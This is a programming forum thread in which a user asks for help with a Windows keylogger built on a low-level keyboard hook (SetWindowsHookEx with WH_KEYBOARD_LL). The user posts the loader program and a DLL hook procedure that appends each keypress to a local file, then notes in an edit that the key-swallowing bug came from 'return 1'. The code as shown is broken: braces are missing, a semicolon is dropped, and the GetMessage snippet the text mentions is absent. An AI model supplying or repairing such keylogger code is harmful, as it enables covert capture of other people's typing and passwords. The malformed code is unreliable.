Thread: SetWindowsHookEx and WM_KEYBOARD_LL

  1. #1
    Ex scientia vera
    Join Date
    Sep 2007

    SetWindowsHookEx and WM_KEYBOARD_LL

    As I delve into the depths that are windows hooks and .dll injections, I've run into a problem. I'm trying to practice with hooks by coding a simple keylogger(For my own use, don't worry) and for some reason, it's not working.

    I'm calling SetWindowsHookEx(WH_KEYBOARD_LL... I started using WM_KEYBOARD, but it stopped working when I was showing it off to a mate of mine for some reason. Either way - after I changed to KEYBOARD_LL, it didn't work either, so google and google and come up with(It actually said so in the remark section of the MSDN documentation) that the program that calls SetWindowsHookEx needs to have a message loop.

    So I google again, find a perfect example which was doing the same as what I was doing, but in that piece of code, he simply calls GetMessage as following:

    If I do this, all keyboard input gets flat out hooked and no key messages actually arrive at their destination. However, oddly enough, everything I type gets processed by my callback function and written to the file.

    Question is: What is it I'm doing wrong? Why does it work for the guy who posted his source code, but eats all the keys in mine?

    Here's the source code for the function in the .dll and the main source code(Yes, I know, I don't need a DLL for this, but I already made one when I found out). Is there something wrong in the callback function?

    #include <windows.h>
    #include <stdio.h>
    #include <stdlib.h>
    #define DLL_NAME "C:\\programming\\c\\windowshook.dll"
    int main(void)
         HANDLE hDll = LoadLibrary(DLL_NAME);
         LPVOID procAddress = GetProcAddress(hDll, "HookProc");
         HHOOK wHook;
         printf("\n** Address of HookProc: 0x&#37;08x\n"
                "** Press enter to set hook ..\n", (unsigned int)procAddress);
         wHook = SetWindowsHookEx(WH_KEYBOARD_LL, procAddress, hDll, 0);
         if(wHook == NULL) 
                  printf("-- Hook could not be set: %d\n", (unsigned int)GetLastError());
                  return -1;
         printf("++ Hook set. Press enter to unhook ..\n");
         while(GetMessage(0,0, 0,0))
         printf("++ Unhooking successful.\n");
         return 0;

    __declspec (dllexport) LRESULT CALLBACK HookProc (int nCode, WPARAM wParam, LPARAM lParam)
         if(nCode < 0) { return CallNextHookEx(0, nCode, wParam, lParam); }
         if(nCode == HC_ACTION)
              if(wParam == WM_KEYDOWN)
                   KBDLLHOOKSTRUCT *kbdHookStruct = (KBDLLHOOKSTRUCT*)lParam;
                   FILE *out = fopen("C:\\programming\\C\\loel.txt", "a+");
                   char kbdState[256];
                   int theChar;
                   ToAsciiEx(kbdHookStruct->vkCode, kbdHookStruct->scanCode, kbdState, (WORD*)&theChar, 0, GetKeyboardLayout(0));
                   fputc(theChar, out);
                   return 1
         return CallNextHookEx(0, nCode, wParam, lParam);

    EDIT: Aw mah gawd.. Sorry about that. JUST after I posted the post, I figured out that return 1 after processing the message could mean that I wouldn't send the message on. And so it was. Instead of return 1, return the return value from CallNextHookEx like at the bottom of the code.
    Sorry again - I've been around with this for hours to no avail and decided to eventually post.
    Last edited by IceDane; 02-28-2008 at 10:07 AM.

Popular pages Recent additions subscribe to a feed
Website Security Test